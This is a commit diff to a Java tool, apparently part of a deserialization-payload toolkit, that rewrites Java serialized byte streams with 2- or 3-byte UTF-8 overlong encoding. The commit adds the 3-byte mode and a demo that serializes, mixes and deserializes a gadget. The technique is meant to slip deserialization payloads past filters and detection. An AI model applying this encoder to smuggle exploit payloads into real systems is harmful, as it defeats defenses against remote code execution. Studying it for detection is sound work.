Whoopsunix
diff --git a/‎README.md
+11-1 b/‎README.md
+11-1
diff --git a/‎attachments/image-20240311100317285.png
157 KB b/‎attachments/image-20240311100317285.png
157 KB
diff --git a/‎attachments/image-20240311100348330.png
136 KB b/‎attachments/image-20240311100348330.png
136 KB
diff --git a/‎src/main/java/com/ppp/Run.java
+2-2 b/‎src/main/java/com/ppp/Run.java
+2-2
diff --git a/‎src/main/java/com/ppp/UTF8BytesMix.java
+36-12 b/‎src/main/java/com/ppp/UTF8BytesMix.java
+36-12
@@ -2,4 +2,14 @@
 
 By. Whoopsunix
 
-抽离出 utf-8-overlong-encoding 的序列化逻辑，直接加密序列化数组, WIKI https://whoopsunix.com/docs/PPPYSO/advance/UTFMIX/
+抽离出 utf-8-overlong-encoding 的序列化逻辑，直接加密序列化数组, WIKI https://whoopsunix.com/docs/PPPYSO/advance/UTFMIX/
+
+2、3 字节的加密都已实现，修改 com.ppp.UTF8BytesMix.type 属性值更改。
+
+2 字节
+
+![image-20240311100317285](attachments/image-20240311100317285.png)
+
+3 字节
+
+![image-20240311100348330](attachments/image-20240311100348330.png)
@@ -26,19 +26,19 @@ public static void main(String[] args) throws Exception {
         print(UEBytes);
 
 
-
         System.out.println("\n\n\n---mix---");
         byte[] mixBytes = new UTF8BytesMix(Serializer.serialize(gadget)).builder();
         print(mixBytes);
         Deserializer.deserialize(mixBytes);
     }
 
 
-    public static void print(byte[] bytes ){
+    public static void print(byte[] bytes) {
         ByteArrayOutputStream out = new ByteArrayOutputStream();
         for (byte b : bytes) {
             out.write(b);
         }
+        System.out.println("byte length:" + bytes.length);
         System.out.println(out);
     }
 }
@@ -9,6 +9,10 @@ public class UTF8BytesMix {
 
     public static byte[] resultBytes = new byte[0];
     public static byte[] originalBytes = new byte[0];
+
+    // 加密字节位数
+    public static int type = 2; //3
+
     // 原 byte[] 坐标
     public static int index = 0;
 
@@ -55,6 +59,7 @@ public static byte[] builder() {
         }
         return resultBytes;
     }
+
     public static void changeTC_PROXYCLASSDESC() {
         int interfaceCount = ((originalBytes[index + 1] & 0xFF) << 24) |
                 ((originalBytes[index + 2] & 0xFF) << 16) |
@@ -73,7 +78,7 @@ public static void changeTC_PROXYCLASSDESC() {
         System.arraycopy(originalBytes, index + 3, originalValue, 0, length);
         index += 3 + length;
 
-        encode(originalValue);
+        encode(originalValue, type);
         index--;
     }
 
@@ -133,7 +138,7 @@ public static boolean changeTC_CLASSDESC() {
                 byte[] originalFieldName = new byte[fieldLength];
                 System.arraycopy(originalBytes, index + 2, originalFieldName, 0, fieldLength);
                 index += 2 + fieldLength;
-                encode(originalFieldName);
+                encode(originalFieldName, type);
             }
 
             /**
@@ -156,7 +161,7 @@ public static boolean changeTC_CLASSDESC() {
                 byte[] originalClassName = new byte[classLength];
                 System.arraycopy(originalBytes, index + 2, originalClassName, 0, classLength);
                 index += 2 + classLength;
-                encode(originalClassName);
+                encode(originalClassName, type);
                 isFiledOver = true;
             } else if (originalBytes[index] == TC_REFERENCE) {
                 /**
@@ -212,7 +217,7 @@ public static boolean changeTC_STRING() {
         }
 
         index += 3 + length;
-        encode(originalValue);
+        encode(originalValue, type);
 
         index--;
         return true;
@@ -251,17 +256,36 @@ public static boolean isField(byte[] checkBytes, int index) {
      *
      * @return
      */
-    public static void encode(byte[] originalValue) {
-        int newLength = originalValue.length * 2;
+    public static void encode(byte[] originalValue, int type) {
+        if (type == 3) {
+            // 3 byte format: 1110xxxx 10xxxxxx 10xxxxxx
+            int newLength = originalValue.length * 3;
+
+            byteAdd((byte) ((newLength >> 8) & 0xFF));
+            byteAdd((byte) (newLength & 0xFF));
+
+            for (int i = 0; i < originalValue.length; i++) {
+                char c = (char) originalValue[i];
+                byteAdd((byte) (0xE0 | ((c >> 12) & 0x0F)));
+                byteAdd((byte) (0x80 | ((c >> 6) & 0x3F)));
+                byteAdd((byte) (0x80 | ((c >> 0) & 0x3F)));
+            }
 
-        byteAdd((byte) ((newLength >> 8) & 0xFF));
-        byteAdd((byte) (newLength & 0xFF));
+        } else {
+            // 2 byte format: 110xxxxx 10xxxxxx
+            int newLength = originalValue.length * 2;
 
-        for (int i = 0; i < originalValue.length; i++) {
-            char c = (char) originalValue[i];
-            byteAdd((byte) (0xC0 | ((c >> 6) & 0x1F)));
-            byteAdd((byte) (0x80 | ((c >> 0) & 0x3F)));
+            byteAdd((byte) ((newLength >> 8) & 0xFF));
+            byteAdd((byte) (newLength & 0xFF));
+
+            for (int i = 0; i < originalValue.length; i++) {
+                char c = (char) originalValue[i];
+                byteAdd((byte) (0xC0 | ((c >> 6) & 0x1F)));
+                byteAdd((byte) (0x80 | ((c >> 0) & 0x3F)));
+            }
         }
+
+
     }
 
     /**
Original file line number	Diff line number	Diff line change
`@@ -26,19 +26,19 @@ public static void main(String[] args) throws Exception {`
`26`	`26`	`print(UEBytes);`
`27`	`27`
`28`	`28`
`29`		`-`
`30`	`29`	`System.out.println("\n\n\n---mix---");`
`31`	`30`	`byte[] mixBytes = new UTF8BytesMix(Serializer.serialize(gadget)).builder();`
`32`	`31`	`print(mixBytes);`
`33`	`32`	`Deserializer.deserialize(mixBytes);`
`34`	`33`	`}`
`35`	`34`
`36`	`35`
`37`		`- public static void print(byte[] bytes ){`
	`36`	`+ public static void print(byte[] bytes) {`
`38`	`37`	`ByteArrayOutputStream out = new ByteArrayOutputStream();`
`39`	`38`	`for (byte b : bytes) {`
`40`	`39`	`out.write(b);`
`41`	`40`	`}`
	`41`	`+ System.out.println("byte length:" + bytes.length);`
`42`	`42`	`System.out.println(out);`
`43`	`43`	`}`
`44`	`44`	`}`